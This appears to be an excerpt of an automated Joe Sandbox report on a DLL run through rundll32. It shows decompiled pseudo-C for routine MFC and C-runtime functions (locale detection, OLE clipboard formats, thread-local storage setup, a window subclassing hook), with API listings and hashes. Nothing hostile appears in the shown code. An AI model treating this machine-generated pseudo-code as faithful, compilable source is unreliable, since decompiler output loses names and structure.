				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x100545cc; // 0x503be811
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10030D27(E10043F3E, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10030030(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E10014538(_t181 - 0x3c, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1001461E(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10014C3E(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

0x10014da8
0x10014da9
0x10014daf
0x10014db3
0x10014dba
0x10014dc0
0x10014dc7
0x10014dd8
0x10014ddf
0x10014de2
0x10014de5
0x10014de8
0x10014df6
0x10014df9
0x10014dfd
0x10014ecb
0x10014f87
0x10014f8b
0x10014f9f
0x10014fa2
0x10014fac
0x10014fb2
0x10014fca
0x10014fd6
0x10014fdb
0x10014fde
0x10014fde
0x10014fac
0x10014ed1
0x10014ee5
0x10014ef0
0x10014f06
0x10014f15
0x10014f2d
0x10014f32
0x10014f38
0x10014f44
0x10014f47
0x10014f59
0x10014f65
0x10014f6a
0x10014f6d
0x10014f6d
0x10014f38
0x10014f77
0x10014f77
0x10014ef0
0x10014e03
0x10014e0b
0x10014e0e
0x10014e11
0x10014e23
0x10014e2c
0x10014e34
0x10014e41
0x10014e44
0x10014e4b
0x10014e4f
0x10014e53
0x10014e56
0x10014e59
0x10014e66
0x10014e72
0x10014e77
0x10014e7a
0x10014e7a
0x10014e81
0x10014e81
0x10014e86
0x10014e89
0x10014ea0
0x10014ea7
0x10014eb6
0x10014fec
0x10014ff3
0x10015003
0x10015006
0x10015009
0x10015010
0x10015013
0x1001501a
0x10015026
0x10015030
0x10015035
0x10015035
0x1001503a
0x1001503f
0x1001505c
0x1001505c
0x10015063
0x10015068
0x00000000
0x10015041
0x10015041
0x10015048
0x10015050
0x00000000
0x00000000
0x10015052
0x10015056
0x00000000
0x00000000
0x00000000
0x10015058
0x1001505a
0x00000000
0x1001505a
0x10014ebc
0x10014ebc
0x1001506a
0x1001506d
0x10015075
0x10015076
0x10015077
0x1001508c
0x1001508c

APIs

__EH_prolog3.LIBCMT ref: 10014DC7
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
GetVersion.KERNEL32 ref: 10014EC3
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
RegQueryValueExA.ADVAPI32 ref: 10014F0D
_sscanf.LIBCMT ref: 10014F2D
ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014F68
RegCloseKey.ADVAPI32(?), ref: 10014F77
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014FD9
_memset.LIBCMT ref: 10014FF3

Strings

GetUserDefaultUILanguage, xrefs: 10014DF0
kernel32.dll, xrefs: 10014DDA
Control Panel\Desktop\ResourceLocale, xrefs: 10014EDB
ntdll.dll, xrefs: 10014F82
GetSystemDefaultUILanguage, xrefs: 10014E39

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002E129(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x1002e136
0x1002e13f
0x1002e148
0x1002e152
0x1002e15c
0x1002e166
0x1002e170
0x1002e17a
0x1002e184
0x1002e18e
0x1002e198
0x1002e1a2
0x1002e1a7
0x1002e1ae

APIs

RegisterClipboardFormatA.USER32(Native), ref: 1002E138
RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5

Strings

FileNameW, xrefs: 1002E189
Link Source, xrefs: 1002E161
Embedded Object, xrefs: 1002E14D
RichEdit Text and Objects, xrefs: 1002E19D
Embed Source, xrefs: 1002E157
FileName, xrefs: 1002E17F
OwnerLink, xrefs: 1002E13A
ObjectLink, xrefs: 1002E143
Native, xrefs: 1002E131
Object Descriptor, xrefs: 1002E16B
Link Source Descriptor, xrefs: 1002E175
Rich Text Format, xrefs: 1002E193

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88

Uniqueness

Uniqueness Score: -1.00%

Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E1003548E(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x10057934;
					_t41 = TlsSetValue;
					 *0x10057940 = _t7;
					if( *0x10057934 == 0) {
						L6:
						 *0x10057938 = TlsGetValue;
						 *0x10057934 = E10035111;
						 *0x1005793c = _t41;
						 *0x10057940 = TlsFree;
					} else {
						__eflags =  *0x10057938;
						if( *0x10057938 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005793c;
							if( *0x1005793c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x100547c8 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10057938);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100310CD();
							 *0x10057934 = E10035042( *0x10057934);
							 *0x10057938 = E10035042( *0x10057938);
							 *0x1005793c = E10035042( *0x1005793c);
							 *0x10057940 = E10035042( *0x10057940);
							_t18 = E10035923();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10035178(_t37);
								goto L15;
							} else {
								_push(E10035304);
								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
								__eflags = _t21 - 0xffffffff;
								 *0x100547c4 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E10035840(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x100547c4);
										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E100351B5(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10035178(_t37);
					return 0;
				}
			}

0x1003548e
0x1003548e
0x1003549a
0x1003549e
0x100354be
0x100354cb
0x100354d8
0x100354dd
0x100354df
0x100354e6
0x100354ec
0x100354f1
0x10035509
0x1003550e
0x10035518
0x10035522
0x10035528
0x100354f3
0x100354f3
0x100354fa
0x00000000
0x100354fc
0x100354fc
0x10035503
0x00000000
0x10035505
0x10035505
0x10035507
0x00000000
0x00000000
0x10035507
0x10035503
0x100354fa
0x1003552d
0x10035533
0x10035536
0x1003553b
0x1003560d
0x1003560d
0x1003560d
0x10035541
0x10035548
0x1003554a
0x1003554c
0x00000000
0x10035552
0x10035552
0x10035568
0x10035578
0x10035588
0x10035595
0x1003559a
0x1003559f
0x100355a1
0x10035608
0x10035608
0x00000000
0x100355a3
0x100355a3
0x100355b4
0x100355b6
0x100355b9
0x100355be
0x00000000
0x100355c0
0x100355cc
0x100355ce
0x100355d2
0x00000000
0x100355d4
0x100355d4
0x100355d5
0x100355e9
0x100355eb
0x00000000
0x100355ed
0x100355ed
0x100355ef
0x100355f0
0x100355f7
0x100355fd
0x10035601
0x10035605
0x10035605
0x100355eb
0x100355d2
0x100355be
0x100355a1
0x1003554c
0x10035611
0x100354a0
0x100354a0
0x100354a8
0x100354a8

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
__mtterm.LIBCMT ref: 100354A0

Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1

GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
__init_pointers.LIBCMT ref: 10035552
__encode_pointer.LIBCMT ref: 1003555D
__encode_pointer.LIBCMT ref: 1003556D
__encode_pointer.LIBCMT ref: 1003557D
__encode_pointer.LIBCMT ref: 1003558D
__decode_pointer.LIBCMT ref: 100355AE
__calloc_crt.LIBCMT ref: 100355C7
__decode_pointer.LIBCMT ref: 100355E1
GetCurrentThreadId.KERNEL32 ref: 100355F7

Strings

FlsFree, xrefs: 100354D2
FlsAlloc, xrefs: 100354B0
KERNEL32.DLL, xrefs: 1003548F
FlsSetValue, xrefs: 100354C5
FlsGetValue, xrefs: 100354B8

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 4287529916-3819984048
Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_push(0x148);
				E10030D90(E1004429C, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t94 =  *(_t117 + 0xc);
				_push(E10015B30);
				 *(_t117 - 0x120) = _t111;
				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
				_t121 = _t54;
				_t97 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
				if(_t121 == 0) {
					_t54 = E100201F1(_t97);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t54 + 0x14);
					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
					__eflags = _t112;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t56;
					if(_t112 != 0) {
						L7:
						__eflags =  *0x10057854;
						if( *0x10057854 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0x10057454;
								if( *0x10057454 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t117 - 0x14) = _t59;
										if(_t59 != 0) {
											_t113 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t113);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t113,  *(_t117 - 0x14));
												_t66 = GetPropA(_t94, _t113);
												__eflags = _t66 -  *(_t117 - 0x14);
												if(_t66 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113);
													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
												}
											}
										}
										L27:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t60;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t50 = _t106 + 0x28;
											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t114 = 0x30;
								E10030030(_t107, _t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
								__eflags = _t72;
								 *0x10057454 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t76 = E10032D2F(_t117 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E1001B083(_t112, _t117, _t94);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
							__eflags = _t83 - E1001B780;
							if(_t83 != E1001B780) {
								 *_t109 = _t83;
							}
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							__eflags =  *(_t117 - 0x14);
							if( *(_t117 - 0x14) != 0) {
								_push( *(_t117 - 0x18));
								_push(0);
								E1001F30C();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t107 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t87 = _t117 - 0x18;
						}
						_t88 = E10014B55(_t87, "ime");
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
					L30:
					return E10030E13(_t94, _t106, _t111);
				}
			}

0x1001c915
0x1001c915
0x1001c915
0x1001c91f
0x1001c924
0x1001c927
0x1001c92a
0x1001c934
0x1001c93a
0x1001c941
0x1001c943
0x1001c946
0x1001c94e
0x1001c950
0x1001c950
0x1001c959
0x1001c96e
0x1001c970
0x1001c973
0x1001c978
0x1001c97a
0x1001c97e
0x1001c984
0x1001c99b
0x1001c99b
0x1001c9a2
0x1001c9ef
0x1001c9ef
0x1001c9f1
0x1001ca59
0x1001ca61
0x1001ca9d
0x1001caa9
0x1001cab0
0x1001cae2
0x1001cae5
0x1001caeb
0x1001caed
0x1001caf0
0x1001caf8
0x1001caff
0x1001cb01
0x1001cb03
0x1001cb0a
0x1001cb12
0x1001cb14
0x1001cb17
0x1001cb1a
0x1001cb28
0x1001cb28
0x1001cb17
0x1001cb03
0x1001cb2e
0x1001cb34
0x1001cb40
0x1001cb46
0x1001cb4d
0x1001cb4f
0x1001cb54
0x1001cb5a
0x1001cb5a
0x1001cb5a
0x1001cb5a
0x00000000
0x1001cb5e
0x00000000
0x1001cab2
0x1001ca65
0x1001ca70
0x1001ca7b
0x1001ca81
0x1001ca87
0x1001ca88
0x1001ca8a
0x1001ca92
0x1001ca95
0x1001ca9b
0x1001cac1
0x1001cac7
0x1001cac9
0x00000000
0x00000000
0x1001cad3
0x1001cad7
0x1001cadc
0x1001cae0
0x00000000
0x00000000
0x00000000
0x1001cae0
0x00000000
0x1001ca9b
0x1001c9f9
0x1001c9fe
0x1001ca05
0x1001ca0e
0x1001ca24
0x1001ca26
0x1001ca2c
0x1001ca2e
0x1001ca30
0x1001ca30
0x1001ca38
0x1001ca3c
0x1001ca40
0x1001ca44
0x1001ca4a
0x1001ca4d
0x1001ca4f
0x1001ca4f
0x00000000
0x1001ca44
0x1001c9a7
0x1001c9ad
0x1001c9b2
0x00000000
0x00000000
0x1001c9b8
0x1001c9bb
0x1001c9c0
0x1001c9cd
0x1001c9d1
0x1001c9d7
0x1001c9d7
0x1001c9e0
0x1001c9e5
0x1001c9e9
0x00000000
0x00000000
0x00000000
0x1001c9e9
0x1001c986
0x1001c98d
0x00000000
0x00000000
0x1001c993
0x1001c995
0x00000000
0x00000000
